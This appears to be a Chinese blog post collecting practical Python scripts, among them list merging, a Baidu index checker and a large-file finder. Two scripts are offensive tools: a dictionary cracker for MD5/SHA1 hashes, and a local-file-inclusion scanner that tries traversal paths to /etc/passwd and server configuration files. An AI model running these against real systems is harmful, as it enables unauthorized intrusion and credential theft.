1. Merging two sorted lists
#!/usr/bin/env python
# coding=utf-8
'''
Given two sorted lists, list_1 and list_2, how can they be merged efficiently
while keeping the result sorted (ascending order is assumed here)?
The idea is straightforward: repeatedly compare the first elements of list_1
and list_2, append the smaller one to a new list, and recurse until every
element has been moved over.
In Python even tail recursion is not particularly efficient, so to avoid
blowing the stack the loop version (loop_merge_sort) is normally used instead.
'''


def recursion_merge_sort1(list_1, list_2):
    tmp = []
    if len(list_1) == 0:
        tmp.extend(list_2)
        return tmp
    elif len(list_2) == 0:
        tmp.extend(list_1)
        return tmp
    else:
        # move the smaller head element into tmp, then recurse on the rest
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        tmp += recursion_merge_sort1(list_1, list_2)
        return tmp


def recursion_merge_sort2(list_1, list_2, tmp=None):
    # tmp defaults to None rather than [], because a mutable default argument
    # would be shared between calls
    if tmp is None:
        tmp = []
    if len(list_1) == 0 or len(list_2) == 0:
        tmp.extend(list_1)
        tmp.extend(list_2)
        return tmp
    else:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        return recursion_merge_sort2(list_1, list_2, tmp)


def loop_merge_sort(list_1, list_2):
    tmp = []
    while len(list_1) > 0 and len(list_2) > 0:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
    # one of the lists is now empty; append whatever remains of the other
    tmp.extend(list_1)
    tmp.extend(list_2)
    return tmp
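A minimal usage sketch (the sample lists are made up); note that all three functions consume their arguments, so pass copies if the inputs must survive. The standard library's heapq.merge does the same job lazily and is usually the simpler choice:

import heapq

list_1 = [1, 3, 5, 7]
list_2 = [2, 4, 6, 8, 10]

# pass copies, since loop_merge_sort empties the lists it is given
print(loop_merge_sort(list_1[:], list_2[:]))   # [1, 2, 3, 4, 5, 6, 7, 8, 10]

# equivalent result with the standard library; heapq.merge returns an iterator
print(list(heapq.merge(list_1, list_2)))       # [1, 2, 3, 4, 5, 6, 7, 8, 10]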
2. Checking whether Baidu has indexed a URL
#!/usr/bin/env python
# coding=utf-8
import requests
from bs4 import BeautifulSoup as bs

# Spoof a browser user-agent; several UAs could be rotated to improve the success rate
headers = {
    'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)'
}


def baidu_url(word):
    '''Build the Baidu search URL. Since we only check indexing, just the first
    10 results are requested; the rn parameter can adjust the result count.'''
    return 'http://www.baidu.com/s?wd=%s' % word


def baidu_cont(url):
    '''Fetch the Baidu search results page.'''
    r = requests.get(url, headers=headers)
    return r.content


def serp_links(word):
    '''Get the final URLs from the Baidu SERP (Search Engine Results Page) for the word.'''
    b_url = baidu_url(word)
    soup = bs(baidu_cont(b_url), 'html.parser')
    b_tags = soup.find_all('h3', {'class': 't'})  # result links are marked with class="t"
    b_links = [tag.a['href'] for tag in b_tags]
    real_links = []
    for link in b_links:
        # follow the redirect with requests to get the final URL, not the snapshot URL
        try:
            r = requests.get(link, headers=headers, timeout=120)
        except Exception:
            real_links.append('page404')
        else:
            real_links.append(r.url)
    return real_links


def indexer(url):
    '''If the URL appears among the result URLs it is indexed; otherwise it is not.'''
    indexed_links = serp_links(url)
    if url in indexed_links:
        return True
    else:
        return False
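A minimal usage sketch (the URL below is a placeholder; the result depends on what Baidu actually returns at query time):

test_url = 'http://www.example.com/some-page.html'   # placeholder URL
print(indexer(test_url))   # True if the URL shows up among the top results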
3. Local dictionary brute-forcing of MD5/SHA1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: py_crackhash.py -- dictionary attack against an md5/sha1 hash
import sys, getopt, hashlib

if len(sys.argv) == 1:
    print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile'
    sys.exit()

opts, args = getopt.getopt(sys.argv[1:], "t:h:w:")
hashtype = ""
hashcode = ""
wordfile = ""
for op, value in opts:
    if op == "-t":
        hashtype = value
    elif op == "-h":
        hashcode = value
    elif op == "-w":
        wordfile = value
    else:
        sys.exit()

w = open(wordfile, 'r')

if hashtype == "md5":
    while True:
        line = w.readline()
        if line:
            y = hashlib.md5(line.rstrip()).hexdigest()
            if hashcode == y:
                print "md5(%s)=%s" % (line.rstrip(), y)
                break
        else:
            # wordlist exhausted without a match
            print 'NULL'
            break

if hashtype == "sha1":
    while True:
        line = w.readline()
        if line:
            y = hashlib.sha1(line.rstrip()).hexdigest()
            if hashcode == y:
                print "sha1(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break

w.close()
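The same idea packaged as a reusable function, as a sketch (the function name crack_hash and its parameters are my own); hashlib.new() lets a single algorithm argument cover both md5 and sha1, and reading the wordlist in binary mode keeps it working on Python 3 as well:

import hashlib

def crack_hash(hashcode, wordfile, algorithm='md5'):
    # Try every wordlist entry until one hashes to the target digest.
    with open(wordfile, 'rb') as f:
        for raw in f:
            word = raw.rstrip(b'\r\n')
            if hashlib.new(algorithm, word).hexdigest() == hashcode:
                return word
    return None

# crack_hash('5f4dcc3b5aa765d61d8327deb882cf99', 'wordlist.txt')  # -> 'password', if the list contains it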
4. Multi-threaded search for the 10 largest files under a directory
#!/usr/bin/env python
# coding=utf-8
import os, os.path
from ConfigParser import RawConfigParser as rcp
from threading import Thread, Lock
import sys
import time

MaxCount = 10


def insert(tenmax, filename, filesize):
    # insert the file at the right position in the (descending) top-list
    i = 0
    while i < len(tenmax) and tenmax[i][1] > filesize:
        i += 1
    tenmax.insert(i, [filename, filesize])


def keepTenMax(tenmax, filename, filesize):
    # keep only the MaxCount largest files in tenmax
    i = len(tenmax)
    if i < MaxCount:
        insert(tenmax, filename, filesize)
    else:
        if filesize > tenmax[i - 1][1]:
            insert(tenmax, filename, filesize)
            tenmax.pop()
        elif filesize == tenmax[i - 1][1]:
            tenmax.append([filename, filesize])
            if len(tenmax) > MaxCount:
                del tenmax[MaxCount:]  # truncate in place so the caller sees the change
        else:
            return


class MyThread(Thread):  # one search thread per directory
    def __init__(self, root, files, tname):
        Thread.__init__(self)
        self.root = root
        self.files = files
        self.name = tname
        self.tenmax = []

    def run(self):
        global count
        for f in self.files:
            filename = self.root + os.sep + f
            filesize = os.stat(filename).st_size
            mylock.acquire()   # acquire the lock before touching the shared counter
            count += 1
            mylock.release()   # release the lock
            keepTenMax(self.tenmax, filename, filesize)


def allDone(threadlist):
    for i in threadlist:
        if i.isAlive():
            return False
    return True


# main
if __name__ == "__main__":
    mylock = Lock()   # lock protecting the global file counter
    count = 0         # global file counter
    tenmax = []
    threadlist = []
    if len(sys.argv) == 1:
        wdir = '.'
    elif len(sys.argv) == 2:
        wdir = sys.argv[1]
    else:
        print 'Usage: findBigFiles.py [wdir]'
        sys.exit()
    tname = 1
    begin = time.time()
    for root, dirs, files in os.walk(wdir):
        if files:
            sthread = MyThread(root, files, tname)  # start one search thread per directory
            threadlist.append(sthread)
            sthread.start()
            print 'thread-' + str(tname) + '-start search dir:' + root
            tname += 1
    for t in threadlist:
        t.join()
    if allDone(threadlist):  # merge the per-thread results into one sorted top-list
        a = []
        for i in threadlist:
            for fname, fsize in i.tenmax:
                keepTenMax(a, fname, fsize)
        tenmax = a
    # print the result and also write it to result.txt in the current directory
    print
    print '[=========================threads count', len(threadlist), '====================]'
    print '[=========================try', count, 'files=======================]'
    print '[=========================the ', MaxCount, ' thMax files list===========]'
    print
    c = 1
    myrcp = rcp()
    myrcp.add_section('Result')
    for fname, fsize in tenmax:
        size = '%.3fMB' % (fsize / 1024.0 / 1024.0)
        print '[%d]%s-%s' % (c, fname, size)
        myrcp.set('Result', '[%d]%s' % (c, fname), size)
        c += 1
    myrcp.write(open('result.txt', 'w'))
    end = time.time()
    usetime = end - begin
    print
    print '[=============================================================]'
    print 'all time:%.3fs' % usetime
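For comparison, a single-threaded sketch of the same task built on heapq.nlargest (the function name find_largest is mine); since the per-file work is only an os.stat() call, the thread-per-directory approach above mostly adds bookkeeping:

import os
import heapq

def find_largest(wdir='.', n=10):
    # walk the tree once, collect (size, path) pairs and keep the n largest
    sizes = []
    for root, dirs, files in os.walk(wdir):
        for name in files:
            path = os.path.join(root, name)
            try:
                sizes.append((os.stat(path).st_size, path))
            except OSError:
                pass   # skip files that disappeared or cannot be stat'ed
    return heapq.nlargest(n, sizes)

# for size, path in find_largest('.'):
#     print('%.3fMB  %s' % (size / 1024.0 / 1024.0, path))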
5. Probing for local file inclusion (LFI) vulnerabilities
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import sys

print ("-----------------------------------------------------")
print ("| usage: py_detect_LFI.py site_url                   |")
print ("| the url looks like http://www.google.com/index.php?id= |")
print ("| written by eip_0x[Freebuf], just 4 fun              |")
print ("-----------------------------------------------------")

# Request a file that does not exist, to record the length of the error page.
site0 = sys.argv[1] + '/kfdsjkf7675637d.txt'
req0 = urllib2.Request(site0)
conn0 = urllib2.urlopen(req0)
data0 = ''
while 1:
    chunk0 = conn0.read(4072)   # error page content, read in chunks
    if not len(chunk0):
        break
    data0 += chunk0

# First look for /etc/passwd at increasing directory-traversal depths.
paths1 = ['/etc/passwd', '../etc/passwd', '../../etc/passwd', '../../../etc/passwd',
          '../../../../etc/passwd', '../../../../../etc/passwd',
          '../../../../../../etc/passwd', '../../../../../../../etc/passwd',
          '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd',
          '../../../../../../../../../../etc/passwd']
# Once /etc/passwd is readable, try configuration files that may hold plaintext credentials.
paths2 = ['/usr/local/app/apache2/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf',
          '/usr/local/app/apache2/conf/extra/httpd-vhosts.conf', '/usr/local/app/php5/lib/php.ini',
          '/etc/sysconfig/iptables', '/etc/httpd/conf/httpd.conf', '/etc/my.cnf',
          '/etc/issue', '/etc/redhat-release', '/usr/local/apche/conf/httpd.conf',
          '/etc/httpd/conf/httpd.conf']

for path in paths1:   # check whether '/etc/passwd' can be included
    site = sys.argv[1] + path
    req = urllib2.Request(site)
    conn = urllib2.urlopen(req)
    data = ''
    while 1:
        chunk = conn.read(4072)
        if not len(chunk):
            break
        data += chunk
    # a response length different from the error page suggests the file was included
    if len(data) != len(data0):
        print path, " this file has been found!!!! u r lucky and have fun!!!!"
        for path2 in paths2:
            # replace("old", "new"[, count]); with no count every occurrence is replaced --
            # here it swaps /etc/passwd for the config file, keeping the traversal prefix that worked
            path2ok = path.replace("/etc/passwd", path2)
            site2 = sys.argv[1] + path2ok
            req2 = urllib2.Request(site2)
            conn2 = urllib2.urlopen(req2)
            data2 = ''
            while 1:
                chunk2 = conn2.read(4072)
                if not len(chunk2):
                    break
                data2 += chunk2
            if len(data2) != len(data0):
                print path2, "this file has been found!!"
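The core length-comparison check could also be wrapped as a small helper on top of requests instead of urllib2; a sketch (the function name probe_lfi and its parameters are my own, and only probe systems you are authorized to test):

import requests

def probe_lfi(base_url, baseline_len, path, timeout=30):
    # Compare the response length for a traversal path against the error-page baseline;
    # a different length suggests the requested file ended up in the response.
    try:
        r = requests.get(base_url + path, timeout=timeout)
    except requests.RequestException:
        return False
    return len(r.content) != baseline_len

# baseline = len(requests.get(base_url + '/kfdsjkf7675637d.txt').content)
# probe_lfi(base_url, baseline, '../../../etc/passwd')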
6. To be continued...
==
Much of the code here was collected while browsing blogs, and I thank the authors for sharing it so generously. I have forgotten the sources of some snippets and will add them as soon as I track them down.
One comment on “一些实用的Python脚本[bak]”
Merge sort
http://zjwyhll.blog.163.com/blog/static/75149781201281291048145